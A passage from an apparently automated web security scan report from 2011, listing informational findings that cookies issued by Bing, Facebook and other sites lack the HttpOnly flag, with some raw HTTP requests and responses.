Connection: close
Set-Cookie: _HOP=I=1&TS=1296352333; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/

17.431. http://www.bing.com/shopping previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/shopping

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_SS=SID=D762CB0D516241079F4B337C6DF4AD2D; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:09:53 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c022f29fb83dd41979e53da7917adbbcf; expires=Tue, 29-Jan-2013 17:09:53 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1621029&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:09:53 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.432. http://www.bing.com/shopping/bird-feeders/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/shopping/bird-feeders/search

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_SS=SID=C5B30FDE5AF1459BB45DF470E55CE4D3; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:09:40 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c47521b9f211b4590b705c63c8b0cb105; expires=Tue, 29-Jan-2013 17:09:40 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1621029&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:09:40 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.433. http://www.bing.com/shopping/healthy-cooking/r/151 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/shopping/healthy-cooking/r/151

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_SS=SID=C18100C403AB4700AAFD75B59C0FBDDD; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:53:16 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c1c459af2715848119a7e3c09ded2dd85; expires=Mon, 28-Jan-2013 23:53:16 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1619993&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:53:16 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.434. http://www.bing.com/shopping/makeup/c/4259 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/shopping/makeup/c/4259

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_SS=SID=5FA465270473442F834AFBC0420AA035; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:09:43 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c78f39d7b1f8a41d483fe8915fb7f5047; expires=Tue, 29-Jan-2013 17:09:43 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1621029&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:09:44 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.435. http://www.bing.com/shopping/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/shopping/search

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_SS=SID=24F36415AB2F4ACC97A8D69FEBC50EE4; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:09:49 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce9aae95052e74b3bb915721c523f685a; expires=Tue, 29-Jan-2013 17:09:49 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1621029&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:09:49 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.436. http://www.bing.com/shopping/swimwear/c/4503 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/shopping/swimwear/c/4503

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_SS=SID=F36266FD84BF426991CE02A2CFF4A782; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:09:31 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c62852a01ec264ed0b807e0bd957f015d; expires=Tue, 29-Jan-2013 17:09:31 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1621029&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:09:31 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.437. http://www.bing.com/shopping/valentines-day-gift-ideas/r/144 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/shopping/valentines-day-gift-ideas/r/144

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_SS=SID=4A7020392DCB444D8DB76BCC0389EA0B; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:53:15 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c77d64d3a6dd04333923fcc4e923d301a; expires=Mon, 28-Jan-2013 23:53:15 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1619993&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:53:15 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.438. http://www.bing.com/videos/browse previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/videos/browse

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_FS=mkt=en-US; domain=.bing.com; path=/
_SS=SID=2D09A236B6E24F73B2FF4D79F9A09F8F; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:52:22 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ca44d79e193c249f0bbd1b7d6be21f3bc; expires=Mon, 28-Jan-2013 23:52:22 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:22 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.439. http://www.bing.com/videos/results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/videos/results.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

VIDSCHUSR=CLICKMODE=0&VMUTE=0&PARTNER=0; expires=Tue, 29-Jan-2013 17:11:47 GMT; domain=.bing.com; path=/videos
_HOP=I=2&TS=1296407507; domain=.bing.com; path=/
_UR=OMW=0; expires=Tue, 29-Jan-2013 17:11:47 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: private
Content-Length: 0
Location: http://www.bing.com/videos/browse
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sun, 30 Jan 2011 17:11:47 GMT
Connection: close
Set-Cookie: VIDSCHUSR=CLICKMODE=0&VMUTE=0&PARTNER=0; expires=Tue, 29-Jan-2013 17:11:47 GMT; domain=.bing.com; path=/videos
Set-Cookie: _HOP=I=2&TS=1296407507; domain=.bing.com; path=/
Set-Cookie: _UR=OMW=0; expires=Tue, 29-Jan-2013 17:11:47 GMT; domain=.bing.com; path=/

17.440. http://www.bing.com/videos/results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/videos/results.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

VIDSCHUSR=CLICKMODE=0&VMUTE=0&PARTNER=0; expires=Mon, 28-Jan-2013 23:52:16 GMT; domain=.bing.com; path=/videos
_HOP=I=1&TS=1296345136; domain=.bing.com; path=/
_SS=SID=CBF8869E7B494B8F8A49EA37CACDCF50; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:16 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: private
Content-Length: 0
Location: http://www.bing.com/videos/browse
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sat, 29 Jan 2011 23:52:16 GMT
Connection: close
Set-Cookie: VIDSCHUSR=CLICKMODE=0&VMUTE=0&PARTNER=0; expires=Mon, 28-Jan-2013 23:52:16 GMT; domain=.bing.com; path=/videos
Set-Cookie: _HOP=I=1&TS=1296345136; domain=.bing.com; path=/
Set-Cookie: _SS=SID=CBF8869E7B494B8F8A49EA37CACDCF50; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:16 GMT; domain=.bing.com; path=/

17.441. http://www.bing.com/videos/watch/video/bachelor-brad-womack-part-1/17w4gt3fa previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/videos/watch/video/bachelor-brad-womack-part-1/17w4gt3fa

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_SS=SID=AD764BCD76884B30A752348A7C436D27; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:52:26 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c8ea69017aa2940ddbc58f461fcf7f67e; expires=Mon, 28-Jan-2013 23:52:26 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:26 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.442. http://www.bing.com/videos/watch/video/black-rhino-celebrates-40th-birthday/ufh7y1eo previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/videos/watch/video/black-rhino-celebrates-40th-birthday/ufh7y1eo

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

from=en-us_msnhp; domain=.bing.com; path=/videos
gt1=42007; domain=.bing.com; path=/videos
ocid=42007; domain=.bing.com; path=/videos
_SS=SID=FE632F9AB87C4452AFEDD763816ED419; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:01:54 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c5525b056b9174877ae080754e0e2103b; expires=Tue, 29-Jan-2013 17:01:54 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1621021&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:01:54 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.443. http://www.bing.com/videos/watch/video/emotional-and-surprising-journeys/17wgxnwyo previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/videos/watch/video/emotional-and-surprising-journeys/17wgxnwyo

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

from=en-us_msnhp; domain=.bing.com; path=/videos
gt1=42008; domain=.bing.com; path=/videos
ocid=42008; domain=.bing.com; path=/videos
_SS=SID=2A046439AE0C4BEAB039A3EF561EA0B8; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:00:33 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2cf0337bd634414bfa98e57cfaca8fdb9c; expires=Tue, 29-Jan-2013 17:00:33 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1621020&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:00:33 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.444. http://www.bing.com/videos/watch/video/glee-season-2-volume-1-dvd-extra-rocky-horror/5svqwfs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/videos/watch/video/glee-season-2-volume-1-dvd-extra-rocky-horror/5svqwfs

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

from=en-us_msnhp; domain=.bing.com; path=/videos
gt1=42007; domain=.bing.com; path=/videos
ocid=42007; domain=.bing.com; path=/videos
_SS=SID=71398422999D4434A086293033409942; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:01:03 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c90f8b31c25db49fb9066aaa59d9cc4f4; expires=Tue, 29-Jan-2013 17:01:03 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1621021&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:01:04 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.445. http://www.bing.com/videos/watch/video/healthy-body-healthy-wallet/1d3rfv95o previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/videos/watch/video/healthy-body-healthy-wallet/1d3rfv95o

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

from=en-us_msnhp; domain=.bing.com; path=/videos
gt1=31036; domain=.bing.com; path=/videos
ocid=31036; domain=.bing.com; path=/videos
_SS=SID=B5B3B7F99F7E42BBBB4D99A3E9BD0689; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:00:31 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2caf34df9069e94b079e21d3eb6a21ddf2; expires=Tue, 29-Jan-2013 17:00:31 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1621020&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:00:32 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.446. http://www.bing.com/videos/watch/video/michaels-new-friend/17w7aehdt previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/videos/watch/video/michaels-new-friend/17w7aehdt

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

from=en-us_msnhp; domain=.bing.com; path=/videos
gt1=42008; domain=.bing.com; path=/videos
ocid=42008; domain=.bing.com; path=/videos
_SS=SID=7FC2B9E0CBF74E82B9CBB24E9A9E9968; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:52:41 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c1794478ef78b42b7a8959b47602883b6; expires=Mon, 28-Jan-2013 23:52:41 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:41 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.447. http://www.bing.com/videos/watch/video/news-9-makes-sure-you-know-its-snowing/1d07cesck previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/videos/watch/video/news-9-makes-sure-you-know-its-snowing/1d07cesck

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

from=en-us_msnhp; domain=.bing.com; path=/videos
_SS=SID=189D8011DB3941A584C4CAEF4613E7B3; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:00:37 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c47c05fe66c744af789142972f6f75ef7; expires=Tue, 29-Jan-2013 17:00:37 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1621020&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:00:38 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.448. http://www.bing.com/videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

from=en-us_msnhp; domain=.bing.com; path=/videos
_SS=SID=B48B65D00BAF403892E682EAA8E2B594; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:02:39 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c33acc47a03c24f7995d266e4fbbb34ac; expires=Tue, 29-Jan-2013 17:02:39 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1621022&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:02:39 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.449. http://www.bing.com/videos/watch/video/ryan-seacrest-part-1/17wnurhvy previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/videos/watch/video/ryan-seacrest-part-1/17wnurhvy

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_SS=SID=A982272C07BD4E90B5DE76723277906D; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:52:24 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c2c1f9480a1dd4b8883876429b35f6f0c; expires=Mon, 28-Jan-2013 23:52:24 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:24 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.450. http://www.bing.com/videos/watch/video/where-it-all-began/17wv375x2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/videos/watch/video/where-it-all-began/17wv375x2

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_SS=SID=0A2FC48D77544E149B050D7F74A8325B; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:52:34 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c281ac093fd6548bda49e28e4474b2b6f; expires=Mon, 28-Jan-2013 23:52:34 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:34 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.451. http://www.bing.com/videos/watch/video/whos-the-one-guest-regis-could-never-get/6fzsvmo previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/videos/watch/video/whos-the-one-guest-regis-could-never-get/6fzsvmo

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_SS=SID=1C20FB52E6FA4423ADB90121688D5B2C; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:52:28 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c5ccc44826f8244ed9ff22ec7485c1ee5; expires=Mon, 28-Jan-2013 23:52:28 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:28 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.blackvoices.com
Path:	/$\|http:/latino.aol.com/$\|.ivillage.com.*/1\|www.ivillage.com/(celeb-news\|entertainment-photos\|tv\|for-kids\|video\|entertainment\|movies\|food\|recipes\|table-talk\|food-for-kids\|food-advice\|food-news\|food-video

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

dcisid=2393165244.2413314893.404292352; path=/
bandType=broadband;DOMAIN=.aol.com;PATH=/;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video HTTP/1.1
Host: www.blackvoices.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.453. http://www.co2stats.com/prowidget.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.co2stats.com
Path:	/prowidget.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CO2STATSPRO-1138=1296398853; expires=Mon, 30-Jan-2012 14:47:33 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /prowidget.php?s=1138&scrfr=0.43571354166666665&ref=http://news.ycombinator.com/news HTTP/1.1
Host: www.co2stats.com
Proxy-Connection: keep-alive
Referer: http://news.ycombinator.com/news
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 14:47:33 GMT
Server: Apache/2.2.17
Set-Cookie: CO2STATSPRO-1138=1296398853; expires=Mon, 30-Jan-2012 14:47:33 GMT
Set-Cookie: CO2STATSPROEVER3=show; expires=Mon, 30-Jan-2012 14:47:33 GMT
Set-Cookie: CO2Stats-U=true; expires=Tue, 01-Feb-2011 05:00:00 GMT
Content-Type: image/png
Content-Length: 8774

.PNG
.
...IHDR...g...)......q.....9iCCPicc..x..Wy4.....{..r...17.kH.P... ..Y..k.T..J........J%iB(.Bd*IJ.......w..z.o...g}...}...u..k.p.P..h.........K89.H0..V`.6P...;<L....._[.....[...F....t'g.....<
...[SNIP]...

17.454. http://www.collectspace.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.collectspace.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

X-Mapping-caklakng=BB42101B5313E42DA76A9065185BD7FC; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.collectspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.455. http://www.facebook.com/2008/fbml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/2008/fbml

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

lsd=GX4VM; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

17.456. http://www.facebook.com/HelenASPopkin previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/HelenASPopkin

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

lsd=rt6y1; path=/; domain=.facebook.com
reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2FHelenASPopkin; path=/; domain=.facebook.com
reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FHelenASPopkin; path=/; domain=.facebook.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.457. http://www.facebook.com/sharer.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/sharer.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

lsd=DtsRk; path=/; domain=.facebook.com
reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fsharer.php; path=/; domain=.facebook.com
reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fsharer.php; path=/; domain=.facebook.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.458. http://www.facebook.com/todd.kenreck previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/todd.kenreck

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

lsd=VUacU; path=/; domain=.facebook.com
reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Ftodd.kenreck; path=/; domain=.facebook.com
